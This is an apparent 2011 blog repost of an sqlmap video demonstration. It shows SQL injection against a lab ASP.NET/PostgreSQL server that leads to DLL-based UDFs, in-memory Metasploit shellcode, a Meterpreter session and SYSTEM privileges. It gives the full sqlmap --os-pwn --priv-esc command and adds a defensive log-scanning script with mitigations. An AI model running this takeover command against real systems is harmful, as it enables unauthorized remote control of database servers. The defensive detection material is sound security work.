Thursday, September 15, 2011

HOWTO : Official sqlmap video demonstration 10

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : Bernardo

This is Bernardo's work, not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap out-of-band takeover features with Metasploit integration: sqlmap is launched against an ASP.NET test page hosted on a Microsoft Windows 2003 server, with PostgreSQL 8.4 as the back-end database management system.

The tool is instructed to identify possible SQL injections and exploit them by spawning an out-of-band Meterpreter session between the user's machine and the database server, then escalating the database process's user privileges to SYSTEM. sqlmap first uploads a dynamic-link library (DLL) that is afterwards used to create two user-defined functions (sys_exec() and sys_bineval()) in the database.

Then it asks the user for options to create the Metasploit shellcode and executes it in memory within the database process via the injected sys_bineval() user-defined function.

The out-of-band Meterpreter session is now established and the control is passed over to the Metasploit command line interface where the user can enjoy a SYSTEM shell on the database server.
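From the defender's side, the sequence described above leaves very visible traces in the PostgreSQL statement log: a CREATE FUNCTION ... LANGUAGE C for each of sys_exec and sys_bineval pointing at the uploaded DLL, followed by a SELECT that calls sys_bineval(). Two preconditions make it work at all: C-language functions can only be created by a superuser role, and the SYSTEM escalation only matters if the database service runs under a privileged account. The script below is an added detection example written for this post; it is not from Bernardo's video or from the sqlmap project. It assumes the server logs DDL (log_statement = 'ddl' or 'all') with log_line_prefix = '%t ', and it flags both the two names sqlmap uses and, more generally, any C-language function creation, since a renamed UDF is the obvious evasion. The log lines, DLL paths and function name renamed_udf are constructed placeholders.

```python
import re
from dataclasses import dataclass
from typing import List

# Function names the post says sqlmap creates on PostgreSQL for --os-pwn.
KNOWN_UDFS = ("sys_exec", "sys_bineval")

# Assumption: log_statement = 'ddl' (or 'all') and log_line_prefix = '%t ',
# producing lines such as
# "2011-09-15 10:00:07 UTC LOG:  statement: CREATE FUNCTION ...".
STATEMENT_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d \S+)\s+LOG:\s+statement:\s+(?P<sql>.+)$"
)
CREATE_FUNC_RE = re.compile(
    r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\s+(?P<name>[\w.]+)\s*\(", re.I
)
# Matches LANGUAGE C or LANGUAGE 'C' but not e.g. LANGUAGE plpgsql.
LANGUAGE_C_RE = re.compile(r"\bLANGUAGE\s+'?C'?(?![\w])", re.I)
CALL_RE = re.compile(r"\b(?P<name>sys_exec|sys_bineval)\s*\(", re.I)


@dataclass
class Finding:
    ts: str
    kind: str       # "udf_created" or "udf_called"
    name: str
    severity: str   # "high" for the known sqlmap names, "medium" for any other C function
    sql: str


def scan_pg_log(lines: List[str]) -> List[Finding]:
    """Return one Finding per suspicious statement, in log order."""
    findings: List[Finding] = []
    for line in lines:
        m = STATEMENT_RE.match(line)
        if not m:
            continue  # ERROR/DETAIL lines and non-statement noise are ignored
        ts, sql = m.group("ts"), m.group("sql")
        created = CREATE_FUNC_RE.search(sql)
        if created and LANGUAGE_C_RE.search(sql):
            name = created.group("name").lower()
            severity = "high" if name in KNOWN_UDFS else "medium"
            findings.append(Finding(ts, "udf_created", name, severity, sql))
            continue  # the CREATE line also contains "name(", so do not double-count it
        for call in CALL_RE.finditer(sql):
            findings.append(Finding(ts, "udf_called", call.group("name").lower(), "high", sql))
    return findings


# Constructed sample log (not real server output) following the sequence in the
# post: a normal application query, the two UDF creations, the in-memory
# shellcode call, then a renamed C function to exercise the generic rule.
SAMPLE_LOG = [
    "2011-09-15 10:00:01 UTC LOG:  statement: SELECT id, name FROM items WHERE id = 1",
    "2011-09-15 10:00:07 UTC LOG:  statement: CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS 'C:/placeholder/udf.dll', 'sys_exec' LANGUAGE C",
    "2011-09-15 10:00:08 UTC LOG:  statement: CREATE OR REPLACE FUNCTION sys_bineval(text) RETURNS int4 AS 'C:/placeholder/udf.dll', 'sys_bineval' LANGUAGE C",
    "2011-09-15 10:00:12 UTC LOG:  statement: SELECT sys_bineval('<shellcode placeholder>')",
    "2011-09-15 10:00:20 UTC LOG:  statement: CREATE FUNCTION renamed_udf(text) RETURNS int4 AS 'C:/placeholder/other.dll', 'entry' LANGUAGE C",
    "2011-09-15 10:00:30 UTC LOG:  statement: SELECT count(*) FROM items",
    "2011-09-15 10:00:31 UTC ERROR:  syntax error at or near \"sys_exec\"",
]

if __name__ == "__main__":
    for f in scan_pg_log(SAMPLE_LOG):
        print(f"{f.ts} [{f.severity}] {f.kind} {f.name}: {f.sql[:60]}")
```

Alerting on the "medium" rule is only noisy if the application role legitimately creates C functions, which it should never do: the practical mitigation is to give the web application a non-superuser role so the CREATE FUNCTION fails outright, and to run the PostgreSQL service under a low-privilege account so that a compromised database process is not already SYSTEM.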

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/iis/get_int_84.aspx?id=1 --os-pwn --msf-path /home/inquis/software/metasploit --priv-esc -v 1

That's all! See you.